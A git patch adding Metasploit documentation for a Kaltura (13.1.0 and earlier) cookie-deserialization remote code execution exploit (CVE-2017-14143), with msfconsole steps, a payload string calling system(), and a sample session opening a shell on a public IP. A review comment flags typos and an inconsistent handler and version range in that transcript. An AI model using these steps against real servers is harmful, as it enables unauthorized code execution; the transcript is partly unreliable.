From 8f2de5cd413dabee7bf3a2befdf79335159d4061 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 23 Jan 2018 12:45:59 -0600 Subject: [PATCH] Land #9205, Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143) Merge branch 'land-9205' into upstream-master --- .../http/kaltura_unserialize_cookie_rce.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md diff --git a/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md b/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md new file mode 100644 index 0000000000..23d00e46d7 --- /dev/null +++ b/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md 
@@ -0,0 +1,42 @@ +## Description + +The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. + + +## Vulnerable Application + + This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization. + Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143. + Installation of Kaltura is difficult, but here is an installation guide: + https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md + + +## Verification Steps + + 1. Start msfconsole + 2. `use exploit/linux/http/kaltura_unserialize_cookie_rce` + 3. `set RHOST https://example.com (or IP address)` + 4. `set ENTRYID 0_xxxxxxxx` + 5. `set payload generic/custom` + 6. `set payloadstr "system('command you want to execute, eg.- ls -la');"` + 7. `run` + +## Scenarios + + ``` + msf use exploits/linux/http/kaltura_unserialize_cookie_rce + msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202 + RHOST => 46.101.209.202 + msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16 + LHOST => 192.168.1.16 + msf exploit(kalkutra_unseialize_cookie_rce)>check + [+] 46.101.209.202:4444 The target is vulnerable. + msf exploit(kalkutra_unseialize_cookie_rce)>run + [*] Started bind handler + [*] Output: + [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200 + + id + uid=33(www-data) gid=33(www-data) groups=33(www-data) + ``` +
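Review bot: the Scenarios transcript in this hunk does not match the module it documents: the prompt reads `exploit(kalkutra_unseialize_cookie_rce)` (two typos, the module is `kaltura_unserialize_cookie_rce`), the `use` line says `exploits/linux/http/...` where the Verification Steps correctly use `exploit/linux/http/...`, and the session sets `LHOST` but then reports "Started bind handler" and a session to `46.101.209.202:4444`, so either the transcript was taken with a bind payload (in which case the `LHOST` line is noise) or with a reverse payload (in which case the handler and port are wrong). Please re-run the module against a test target and paste the real output. Two smaller points in the same hunk: the Description says "before 13.2.0" while the Vulnerable Application section says "(<=13.1.0)", so pick one statement of the affected range and use it in both places; and the install guide linked is the `Mercury-13.8.0` branch, which is newer than the affected range, so a note on how to obtain a vulnerable build (or a pointer to an older package set) would make the Vulnerable Application section usable. The Verification Steps would also benefit from one line saying where the `ENTRYID` value (`0_xxxxxxxx`) comes from, since the steps require it but never explain it, and step 3 should set `RHOST` to a host or IP rather than `https://example.com`, with `RPORT`/`SSL` covering the scheme.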